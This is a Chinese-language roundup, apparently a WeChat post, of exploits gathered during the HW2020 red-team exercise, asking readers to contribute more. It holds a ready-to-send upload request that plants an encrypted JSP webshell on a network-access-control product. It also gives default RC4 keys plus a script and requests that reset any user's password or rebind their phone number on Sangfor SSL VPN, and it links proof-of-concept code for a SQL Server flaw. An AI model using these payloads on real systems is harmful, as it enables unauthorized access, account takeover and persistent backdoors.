漏洞汇总
https://www.yuque.com/docs/share/ad8192ca-39ec-4950-86e9-01dfa989bf6f?#(密码:gf34) 《HW2020 - 0day总结》
9月19日更新
7.联软准入漏洞
漏洞详情:
任意文件上传漏洞,存在于用户自检报告上传时,后台使用黑名单机制对上传的文件进行过滤和限制,由于当前黑名单机制存在缺陷,文件过滤机制可以被绕过,导致存在文件上传漏洞;利用该漏洞可以获取webshell权限。(猜测利用黑名单的其他后缀名绕过)
命令执行漏洞,存在于后台资源读取过程中,对于自动提交的用户可控参数没有进行安全检查,可以通过构造特殊参数的数据包,后台在执行过程中直接执行了提交数据包中的命令参数,导致命令执行漏洞;该漏洞能够以当前运行的中间件用户权限执行系统命令,根据中间件用户权限不同,可以进行添加系统账户,使用反弹shell等操作。
POST /uai/download/uploadfileToPath.htm HTTP/1.1HOST: xxxxx-----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"Content-Type: image/png<% import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>-----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="uploadpath"../webapps/notifymsg/devreport/-----------------------------570xxxxxxxxx6025274xxxxxxxx1--
21.CNVD-2020-27769-拓尔思TRSWAS5.0文件读取漏洞
乌龙事件:https://mp.weixin.qq.com/s/Wm_gGZyLXj1S3WTUiaUYQA
https://www.cnvd.org.cn/flaw/show/CNVD-2020-27769
23.Yii反序列化RCE利用链分析
见公众号,今日推送第二篇文章。
24.深信服SSL VPN nday Pre auth任意密码重置
来自微信热心网友的分享:
某VPN加密算法使用了默认的key,攻击者构利用key构造重置密码数据包从而修改任意用户的密码
利用条件:需要登录账号
M7.6.6R1版本key为20181118
M7.6.1key为20100720
计算RC4_STR_LEN脚本from Crypto.Cipher import ARC4from binascii import a2b_hexdef myRC4(data,key):rc41 = ARC4.new(key)encrypted = rc41.encrypt(data)return encrypted.encode('hex')def rc4_decrpt_hex(data,key):rc41 = ARC4.new(key)return rc41.decrypt(a2b_hex(data))key = '20100720'data = r',username=TARGET_USERNAME,ip=127.0.0.1,grpid=1,pripsw=suiyi,newpsw=TARGET_PASSWORD,'print(myRC4(data,key))
POST https://<PATH>/por/changepwd.cspsessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)
25.深信服SSL VPN 修改绑定手机号
来自微信热心网友的分享:(来源:渗了个透 公众号)
修改手机号接口未正确鉴权导致越权覆盖任意用户的手机号码
利用:需要登录账号
POST https://路径/por/changetelnum.csp?apiversion=1newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sid=0&ip=127.0.0.1
27.mssql远程代码执行(CVE-2020-0618)
poc: https://github.com/euphrat1ca/CVE-2020-0618
https://github.com/wortell/cve-2020-0618
暂无POC的漏洞如下,欢迎各位师傅提供线索:
9.深信服 SSL VPN 远程代码执行漏洞14.coremail 0day - may be rce15.activemq远程代码执行0day18.CVE-2020-7293 McAfee Web 多个高危漏洞20.VMware Fusion 权限提升漏洞(CVE-2020-3980)21.CNVD-2020-27769-拓尔思TRSWAS5.0文件读取漏洞22. Weblogic IIOP 反序列化漏洞26.Spectrum Protect Plus任意代码执行漏洞(cve-2020-4711)
感谢几位在公众号回复,提供新poc和详情的朋友,出于安全考虑,这里就不公布你们的id了。
也欢迎其他的朋友进行分享,无论是一篇文章,还是一个poc。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论